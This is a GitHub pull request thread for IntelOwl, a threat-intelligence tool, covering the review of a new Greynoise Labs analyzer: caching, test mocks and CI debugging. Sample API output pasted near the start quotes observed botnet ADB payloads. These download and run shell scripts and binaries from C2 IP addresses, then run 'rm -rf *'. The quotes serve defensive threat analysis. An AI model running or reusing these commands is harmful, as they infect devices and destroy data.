fixes #1758 - greynoise labs analyzer #2210

Closed
wants to merge 19 commits into from

Conversation

moonpatel
Contributor

@moonpatel moonpatel commented Mar 19, 2024

Closes #1758. (If your PR is made by a single commit, please add that clause in the commit too. This is all required to automate the closure of related issues.)

Description

Please include a summary of the change and link to the related issue.

Type of change

Please delete options that are not relevant.

  • Bug fix (non-breaking change which fixes an issue).
  • Breaking change (fix or feature that would cause existing functionality to not work as expected).
  • New feature (non-breaking change which adds functionality).

Checklist

  • I have read and understood the rules about how to Contribute to this project
  • The pull request is for the branch develop
  • A new plugin (analyzer, connector, visualizer, playbook, pivot or ingestor) was added or changed, in which case:
    • I strictly followed the documentation "How to create a Plugin"
    • Usage file was updated.
    • Advanced-Usage was updated (in case the plugin provides additional optional configuration).
    • If the plugin requires mocked testing, _monkeypatch() was used in its class to apply the necessary decorators.
    • I have dumped the configuration from Django Admin using the dumpplugin command and added it in the project as a data migration. ("How to share a plugin with the community")
    • If a File analyzer was added and it supports a mimetype which is not already supported, you added a sample of that type inside the archive test_files.zip and you added the default tests for that mimetype in test_classes.py.
    • If you created a new analyzer and it is free (does not require API keys), please add it in the FREE_TO_USE_ANALYZERS playbook by following this guide.
    • Check if it could make sense to add that analyzer/connector to other freely available playbooks.
    • I have provided the resulting raw JSON of a finished analysis and a screenshot of the results.
  • If external libraries/packages with restrictive licenses were used, they were added in the Legal Notice section.
  • Linters (Black, Flake, Isort) gave 0 errors. If you have correctly installed pre-commit, it does these checks and adjustments on your behalf.
  • I have added tests for the feature/bug I solved (see tests folder). All the tests (new and old ones) gave 0 errors.
  • If changes were made to an existing model/serializer/view, the docs were updated and regenerated (check CONTRIBUTE.md).
  • If the GUI has been modified:
    • I have provided a screenshot of the result in the PR.
    • I have created new frontend tests for the new component or updated existing ones.

Important Rules

  • If you fail to complete the Checklist properly, your PR won't be reviewed by the maintainers.
  • If your changes decrease the overall test coverage (you will know after the Codecov CI job is done), you should add the required tests to fix the problem.
  • Every time you make changes to the PR and you think the work is done, you should explicitly ask for a review. After the PR has been reviewed and you have received a "change request", you should explicitly ask for a review again once you have made the requested changes.

@moonpatel
Contributor Author

Screenshot from 2024-03-19 10-38-38

JSON output:

{
  "noiserank": {
    "errors": [
      {
        "message": "1.23.45.122 was not found in NoiseRank",
        "path": ["noiseRank"]
      }
    ],
    "data": null
  },
  "topknocks": {
    "errors": [
      {
        "message": "1.23.45.122 was not found in KnockKnock",
        "path": ["topKnocks"]
      }
    ],
    "data": null
  },
  "topc2s": {
    "data": {
      "topC2s": {
        "queryInfo": { "resultsAvailable": 1471, "resultsLimit": 147 },
        "c2s": [
          {
            "source_ip": "94.156.69.247",
            "c2_ips": ["103.172.79.74"],
            "c2_domains": [],
            "payload": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000����host::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000@\u0001\u0000\u0000\u0010b\u0000\u0000����shell:cd /data/local/tmp/; busybox wget http://103.172.79.74/w.sh; sh w.sh; curl http://103.172.79.74/c.sh; sh c.sh; wget http://103.172.79.74/wget.sh; sh wget.sh; curl http://103.172.79.74/wget.sh; sh wget.sh; busybox wget http://103.172.79.74/wget.sh; sh wget.sh; busybox curl http://103.172.79.74/wget.sh; sh wget.sh\u0000",
            "hits": 3934,
            "pervasiveness": 92
          },
          {
            "source_ip": "45.90.97.172",
            "c2_ips": ["45.90.97.58"],
            "c2_domains": [],
            "payload": "CNXN\u0000\u0000\u0000\u0001\u0000\u0000\u0004\u0000\u001b\u0000\u0000\u0000M\n\u0000\u0000����host::features=cmd,shell_v2OPENX\u0001\u0000\u0000\u0000\u0000\u0000\u0000u\u0000\u0000\u0000\f%\u0000\u0000����shell:cd /data/local/tmp/; busybox wget http://45.90.97.58/skid.arm7; chmod 777 skid.arm7; ./skid.arm7 lol; rm -rf *\u0000",
            "hits": 3745,
            "pervasiveness": 83
          },
......

I have not included the whole response JSON because it was too large.

@moonpatel moonpatel changed the title added new analyzer - greynoise labs fixes #1758 - greynoise labs analyzer Mar 19, 2024
@@ -0,0 +1,33 @@
# This file is a part of IntelOwl https://github.com/intelowlproject/IntelOwl
Member

This file is not required because this analyzer requires additional configuration.

Comment on lines 25 to 31
"topc2s": {
"query_string": "query TopC2s { topC2s { queryInfo \
{ resultsAvailable resultsLimit } c2s { source_ip c2_ips \
c2_domains payload hits pervasiveness } } } "
},
}

Member

I think the analyzer is cool. The only problem is this type of query, which does not support IP addresses anymore.

For these cases, we usually make the analyzer work in a different way: we maintain a local cache of the data extracted from the Greynoise endpoint (a file on the system) and open it whenever the analyzer is triggered.

The update method lets you define how and when this file is refreshed.
Please check other analyzers such as Tor, Maxmind, and Feodo Tracker, which do something very similar to what I described.
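
The cache-then-lookup pattern described in this comment could be sketched roughly as follows. This is a minimal illustration, not the IntelOwl implementation: `DB_LOCATION`, `update_cache`, `lookup`, and the `fetch_c2_ips` callable are all hypothetical names, and the real analyzer would call the Greynoise API inside its own `update` class method.

```python
import json
import os
import tempfile

# Hypothetical location of the cached dump; the real analyzer defines its own path.
DB_LOCATION = os.path.join(tempfile.gettempdir(), "topc2s_ips.json")


def update_cache(fetch_c2_ips, db_location=DB_LOCATION):
    """Refresh the local file with the IPs returned by `fetch_c2_ips`.

    `fetch_c2_ips` is a stand-in for the real API call and must return
    an iterable of IP strings.
    """
    ips = sorted(set(fetch_c2_ips()))
    with open(db_location, "w", encoding="utf-8") as f:
        json.dump(ips, f)
    return True


def lookup(ip, fetch_c2_ips, db_location=DB_LOCATION):
    """Check `ip` against the cached list, building the cache on first use."""
    if not os.path.isfile(db_location):
        update_cache(fetch_c2_ips, db_location)
    with open(db_location, encoding="utf-8") as f:
        cached = set(json.load(f))
    return {"found": ip in cached}
```

With this shape, a run never queries the remote endpoint directly once the file exists; only the scheduled update does.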

Contributor Author

@moonpatel moonpatel Mar 21, 2024

Hey @mlodic, I have added the update method to this class and made some modifications to the run method. Here is the new output format after changing the run method:

{
  "noiserank": {
    "data": {
      "noiseRank": {
        "queryInfo": { "resultsAvailable": 1, "resultsLimit": 1 },
        "ips": [
          {
            "ip": "20.235.249.22",
            "noise_score": 12,
            "sensor_pervasiveness": "very low",
            "country_pervasiveness": "low",
            "payload_diversity": "very low",
            "port_diversity": "very low",
            "request_rate": "low"
          }
        ]
      }
    }
  },
  "topknocks": {
    "errors": [
      {
        "message": "20.235.249.22 was not found in KnockKnock",
        "path": ["topKnocks"]
      }
    ],
    "data": null
  },
  "topc2s": { "found": true }
}
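
For readers consuming a report shaped like the one above, one possible way to separate hits from misses is to check each section for an "errors" list. This is only a sketch; `summarize` is a hypothetical helper and the report literal is a trimmed copy of the output shown in this comment.

```python
def summarize(report):
    """Map each query name to "ok" or to the list of error messages it returned."""
    summary = {}
    for name, result in report.items():
        errors = result.get("errors")
        summary[name] = [e["message"] for e in errors] if errors else "ok"
    return summary


# Trimmed copy of the report shared above.
report = {
    "noiserank": {"data": {"noiseRank": {"ips": [{"ip": "20.235.249.22", "noise_score": 12}]}}},
    "topknocks": {
        "errors": [{"message": "20.235.249.22 was not found in KnockKnock", "path": ["topKnocks"]}],
        "data": None,
    },
    "topc2s": {"found": True},
}

print(summarize(report))
```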

@moonpatel
Contributor Author

Hey @mlodic I have made the required changes, can you review them?

Member

@mlodic mlodic left a comment

great! I think we are almost done!

"health_check_schedule": None,
"update_schedule": {
"minute": "0",
"hour": "*",
Member

Their docs say:

topC2s
Description
Return the top 1% of C2s ranked by pervasiveness GreyNoise has observed over the previous 24 hours. This data may be up to 4.5 hours old.

So I'd say we can reduce the update frequency to once every 6 hours.
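
As an illustration of the suggested change, a crontab-style schedule that fires every 6 hours might look like the dict below. Only the "minute" and "hour" keys appear in the diff; the `*/6` value and the small `runs_at` evaluator are assumptions added here to show which hours would match.

```python
# Crontab-style fields, mirroring the two keys shown in the diff.
# "*/6" at minute 0 would fire at 00:00, 06:00, 12:00 and 18:00.
update_schedule = {
    "minute": "0",
    "hour": "*/6",
}


def runs_at(hour, minute, schedule=update_schedule):
    """Tiny evaluator for the two fields used here (supports '*', 'N' and '*/N')."""

    def matches(field, value):
        if field == "*":
            return True
        if field.startswith("*/"):
            return value % int(field[2:]) == 0
        return value == int(field)

    return matches(schedule["hour"], hour) and matches(schedule["minute"], minute)


# Hours of the day on which the update would run.
print([h for h in range(24) if runs_at(h, 0)])
```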

def _monkeypatch(cls):
    patches = [
        if_mock_connections(
            patch("requests.post", return_value=MockUpResponse({}, 200))
Member

Can you please add example outputs to the tests here, like the ones you shared with me?

That way the tests would run against a real output, and we would also keep an example of their reports here.

Please add a mock for every request you make (2). See Feodo Tracker for an example.

Contributor Author

So one request whose IP is in noiseRank and one whose IP is not in noiseRank, right? @mlodic

Member

Basically, the tests cycle through the list of mocks that you write and use one of them each time the analyzer makes an HTTP request with the patched method.

So you need one mock for each request that you make, that is, one for each Greynoise endpoint.
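
The "one mock per request" idea can be pictured with the standard library alone. The sketch below uses `unittest.mock.Mock` with a list as `side_effect`, which hands out the next canned response on each call; it illustrates the general mechanism rather than IntelOwl's own test harness, and `run_queries` is a hypothetical stand-in for an analyzer run.

```python
from unittest.mock import Mock

# Two canned responses, one per HTTP request the analyzer is expected to make.
# The payloads are trimmed versions of the outputs shared earlier in this thread.
noiserank_response = {
    "data": {"noiseRank": {"ips": [{"ip": "20.235.249.22", "noise_score": 12}]}}
}
topknocks_response = {
    "errors": [
        {"message": "20.235.249.22 was not found in KnockKnock", "path": ["topKnocks"]}
    ],
    "data": None,
}

# A Mock with a list as side_effect returns the next item on each call.
fake_post = Mock(side_effect=[noiserank_response, topknocks_response])


def run_queries(post):
    """Stand-in for an analyzer run that issues two requests in a fixed order."""
    return {
        "noiserank": post("noiseRank query"),
        "topknocks": post("topKnocks query"),
    }


report = run_queries(fake_post)
```

If the analyzer made a third call, the exhausted list would raise `StopIteration`, which is a quick signal that a mock is missing.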

}

try:
logger.info("Fetching data from greynoise API.....")
Member

Please log the observable name here too. Otherwise static logs like this are useless, since the base class already generates generic logs like this one.

if not os.path.exists(db_location):
return False

logger.info("Data fetched from greynoise API.....")
Member

same here

"base_path": "api_app.analyzers_manager.observable_analyzers",
},
"name": "Greynoise_Labs",
"description": "scan an IP against the Greynoise Labs API (requires authentication token obtained from cookies on greynoise website)",
Member

Please add markdown with a link to the service here so that it is displayed in the GUI.

@moonpatel
Contributor Author

Hey @mlodic, I made the required changes. Can you review them?

Member

@mlodic mlodic left a comment

last thing and we are done

@moonpatel
Contributor Author

Done @mlodic !
image

@@ -104,7 +112,9 @@ def _update_db(cls, auth_token: str):
         }

         try:
-            logger.info("Fetching data from greynoise API (Greynoise_Labs).....")
+            logger.info(
+                f"Fetching data from greynoise API ({cls._get_observable_name()})....."
Member

It's enough to use self.observable_name because it is inherited from the base class :P

Contributor Author

But _update_db is a class method, so it cannot access observable_name. I have already tried it and it does not work. @mlodic
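
The point about class methods can be reproduced in isolation. In the sketch below, `BaseAnalyzer` and `LabsAnalyzer` are hypothetical stand-ins, assuming the observable name is assigned per instance in the base class; a class method receives the class, not an instance, so the attribute is simply not there.

```python
class BaseAnalyzer:
    def __init__(self, observable_name):
        # Set per instance, when an analysis job is created.
        self.observable_name = observable_name


class LabsAnalyzer(BaseAnalyzer):
    @classmethod
    def _update_db(cls):
        # `cls` is the class itself; no instance exists here,
        # so there is no observable to read.
        return getattr(cls, "observable_name", None)

    def run(self):
        # Instance methods can read it through `self`.
        return self.observable_name
```

An update that runs on a schedule is not tied to any single observable, which is why a static log message is the natural fit there.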

Member

Ah, you are right, my bad. Then there is no need for anything else in the log, so you can revert to the previous message.

Contributor Author

hardcoded? @mlodic

Member

yep

…est mock response in greynoise analyzer"

This reverts commit 90a4c22.
@moonpatel
Contributor Author

Done @mlodic !

@mlodic
Member

mlodic commented Mar 22, 2024

you reverted too many things :P

@moonpatel
Contributor Author

Done @mlodic. I reverted to a different commit by mistake.

@moonpatel
Contributor Author

Are there any more changes required? @mlodic

@mlodic
Member

mlodic commented Mar 22, 2024

you could fix the tests :)

@moonpatel
Contributor Author

I guess the error occurs when update tries to get auth_token. @mlodic


@classmethod
def update(cls):
    auth_token = cls._get_auth_token()
Contributor Author

@moonpatel moonpatel Mar 22, 2024

I think this is where the error occurs during testing. But how do I get the auth_token during testing? Which file should I look at?

Member

First, we would need a new test for the update, like the one we have for Feodo Tracker, for instance: https://github.com/intelowlproject/IntelOwl/pull/2126/files

Then, do not raise an exception here:

                    if not os.path.isfile(value["db_location"]) and not self.update():
                        raise AnalyzerRunException(f"Failed extraction from {key} db")

That way not only would the test work, but the analyzer would also not fail if 1 query out of 3 fails.
Please just write an error log instead of raising the AnalyzerRunException, which makes the whole analyzer fail.
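
A rough sketch of the requested behavior: each query is run independently, and a failure is logged and recorded in the report instead of aborting the whole run. `run_all` and the shape of `queries` (name mapped to a zero-argument callable) are assumptions made for illustration, not the analyzer's actual code.

```python
import logging

logger = logging.getLogger(__name__)


def run_all(queries):
    """Run each query independently; a failure is logged and recorded
    in the report instead of aborting the whole analysis.

    `queries` maps a name to a zero-argument callable (hypothetical shape).
    """
    report = {}
    for name, query in queries.items():
        try:
            report[name] = query()
        except Exception as exc:
            # Log and keep going, so the remaining queries still run.
            logger.error("Failed extraction from %s db: %s", name, exc)
            report[name] = {"error": str(exc)}
    return report
```

With this structure, a missing or stale local db for one query leaves the other two results intact.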

@moonpatel
Contributor Author

moonpatel commented Mar 25, 2024

Now all the test cases are passing @mlodic .

@mlodic
Member

mlodic commented Mar 25, 2024

last error remains

@moonpatel
Contributor Author

moonpatel commented Mar 26, 2024

I tried logging the details of the response received when update is called during testing. The response's status code is 500, so update returns False.

image

image

I tried sending the request using the Greynoise Labs playground (https://api.labs.greynoise.io/1/docs/) with this header: Authorization: Bearer . I received a response with a 500 status code.
image

So I think the problem is that requests.post is not mocked and the request is sent to the real URL. @mlodic

@mlodic
Member

mlodic commented Mar 26, 2024

The CI runs with MOCK_CONNECTIONS set to True, which means that connections should be mocked. That is not the case when you test locally, because MOCK_CONNECTIONS is False by default, since it makes sense to test the real connection locally.

To debug the problem better, please set MOCK_CONNECTIONS to True.
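
To make the effect of the flag concrete, here is a hypothetical sketch of a helper that applies patches only when mocking is enabled. It is not IntelOwl's actual `if_mock_connections`; the module-level `MOCK_CONNECTIONS` constant, the helper body, and the use of `json.loads` as a stand-in for `requests.post` are all assumptions chosen so the example runs with the standard library alone.

```python
import json
from unittest.mock import patch

MOCK_CONNECTIONS = True  # assumption: read from settings in the real project


def if_mock_connections(*patchers):
    """Apply the given patchers to a function only when MOCK_CONNECTIONS is set."""

    def decorator(func):
        if not MOCK_CONNECTIONS:
            return func  # real connections: leave the function untouched
        for p in reversed(patchers):
            func = p(func)
        return func

    return decorator


@if_mock_connections(patch("json.loads", new=lambda _text: {"mocked": True}))
def fetch():
    # Stand-in for a network call; json.loads plays the role of requests.post.
    return json.loads('{"mocked": false}')
```

With the flag off, `fetch` would reach the real function, which matches the difference between local runs and CI described in this comment.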

@moonpatel
Contributor Author

Now there is a different error! @mlodic

@moonpatel moonpatel closed this Mar 27, 2024
@moonpatel moonpatel reopened this Mar 27, 2024
@g4ze
Member

g4ze commented Mar 27, 2024

Pull from develop, there have been migrations :)

@moonpatel
Contributor Author

moonpatel commented Mar 28, 2024

@mlodic I have opened a new PR with the latest migrations included from develop. (#2210)

@mlodic
Member

mlodic commented Mar 28, 2024

Idk why a new PR is necessary but ok :P

@mlodic mlodic closed this Mar 28, 2024
@mlodic mlodic mentioned this pull request Mar 28, 2024
22 tasks